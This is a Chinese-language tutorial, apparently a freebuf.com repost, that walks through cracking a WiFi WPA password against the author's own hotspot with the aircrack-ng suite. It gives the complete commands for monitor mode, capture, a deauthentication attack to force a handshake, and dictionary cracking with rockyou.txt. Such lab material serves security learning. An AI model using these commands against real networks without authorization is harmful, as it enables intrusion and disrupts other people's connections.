无线网络,是指无需布线就能实现各种通信设备互联的网络。无线网络技术涵盖的范围很广,既包括允许用户建立远距离无线连接的全球语音和数据网络,也包括为近距离无线连接进行优化的红外线及射频技术。根据网络覆盖范围的不同,可以将无线网络划分为无线广域网(WWAN:Wireless Wide Area Network)、无线局域网(WLAN:Wireless Local Area Network)、无线城域网(WMAN:Wireless Metropolitan Area Network)和无线个人局域网(WPAN:Wireless Personal Area Network)。–>来自百度百科
准备阶段-插入网卡后,选择添加到虚拟机,iwconfig可以看到多出一个wlan 0网卡;
激活网卡
airmon-ng start wlan0
这个时候iwconfig可以看见已经激活
探测阶段-利用网卡搜索周围能获取到WiFi的信息,这里以及下面的所有抓包阶段都是按两次q退出,不要强制退出。
airodump-ng wlan0mon
抓包阶段-利用airodump
这里选择了我的热点,这里需要注意的是我们设置保存的文件名是zcc,但是生成的文件却不是zcc.ivs,而是zcc-01.ivs。
airodump-ng --ivs --bssid D6:D0:40:0B:72:7E -w zcc -c 8 wlan0mon
其中2C:DB:07:84:9A:6D是我的本机,他链接到了D6:D0:40:0B:72:7E这个网络内。
这里也可以抓取CAP包,可以看见他生成了好几个文件,其中有CAP包:
airodump-ng -c 8 -w /root/Desktop/ --bssid D6:D0:40:0B:72:7E wlan0mon
攻击阶段-aireplay(谨记:开新窗口运行)
此处需要新开一个shell
aireplay-ng -0 1 -a D6:D0:40:0B:72:7E -c 2C:DB:07:84:9A:6D wlan0mon
当出现WPA handshake:D6:D0:40:0B:72:7E时,说明抓包完成,获取到了wifi包的加密秘钥(前提条件是有机子连接这个wifi);
收集阶段-字典攻击CAP(字典收集)
(1)使用kali自带密钥字典:
• cd /usr/share/wordlists/
• gzip -d rockyou.txt.gz
(2)导入本地的密码本
破解阶段-aircrack破解
(1)ivs数据包爆破
aircrack-ng -w password.txt zcc-01.ivs
KEY FOUND!后面中括号中就是WiFi密码。
(2)破解cap包情况
aircrack-ng -w /usr/share/wordlists/rockyou.txt /root/Desktop/-01.cap
成功破解!
来源:freebuf.com 2021-06-23 17:36:57 by: zcczcc
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
请登录后发表评论
注册